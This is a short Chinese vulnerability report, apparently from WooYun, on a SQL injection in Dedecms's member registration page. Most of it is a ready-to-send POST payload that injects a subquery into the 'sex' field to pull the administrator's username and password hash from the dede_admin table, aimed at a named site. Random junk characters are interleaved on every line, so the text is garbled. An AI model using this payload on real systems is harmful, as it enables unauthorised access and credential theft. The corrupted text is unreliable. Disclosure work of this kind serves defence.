漏洞类型: SQL注射漏洞
7 t, b1 \1 L6 N: R简要描述:
( W% L% z: a/ Q9 z1 C$ Q; X5 \8 I ' o4 b; s3 d5 r0 S. m
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
3 K2 n( T0 L: U4 v# i原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
s4 X, M/ x: N: {* m0 P详细说明:跟这个漏洞
6 q& m; ?; \ m% Z% O- N9 x
2 I7 d& n" }# W4 ]+ uWooYun: Dedecms SQL注射导致审核机制绕过漏洞2 s% u. h4 ~4 @1 D/ g
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
8 I! x; \ a7 |) j# ~) hPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
* \4 }" H" ~* ?( c2 P2 R- B1 `6 t
0 I$ t1 f- K5 L1 |$ b& ^www.political-security.com/member/reg_new.php
1 j# J9 {. m' S+ ^6 L# C- ]
1 y. Y5 t2 X x xPOST6 F: M L; h6 ?5 s& V
/ U; Z0 u! X. X9 fdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
! a, L1 D4 S% c, Tuserid=c4rp3nt3r&uname=c4rp3nt3r9 p) y1 `( e8 o2 P }
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss. i( O" p5 y& P/ B0 W5 f( ?
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
1 h$ `/ D. q. y7 X, G8 U(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
+ ?- B, u# m9 r4 ~6 Y& A$ }%00&vdcode=glos&agree= |